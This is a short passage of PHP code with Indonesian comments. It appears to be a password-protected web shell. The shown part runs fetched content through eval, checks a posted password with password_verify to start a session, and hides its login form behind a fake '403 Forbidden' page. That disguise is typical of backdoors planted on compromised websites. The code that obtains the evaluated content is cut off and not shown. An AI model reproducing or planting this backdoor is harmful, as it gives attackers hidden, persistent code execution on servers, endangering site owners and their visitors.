" . $content); // Tetap menggunakan eval } exit; } // Proses login if ($_SERVER["REQUEST_METHOD"] == "POST") { $password = $_POST['password']; // Cek apakah password yang dimasukkan sesuai dengan password terenkripsi if (password_verify($password, $hashed_password)) { $_SESSION['loggedin'] = true; header("Location: " . $_SERVER['PHP_SELF']); // Refresh halaman untuk melanjutkan exit; } else { $error_message = "Password salah."; } } ?> 403 Forbidden

403

Forbidden

Access to this resource on the server is denied!

$error_message

"; } ?>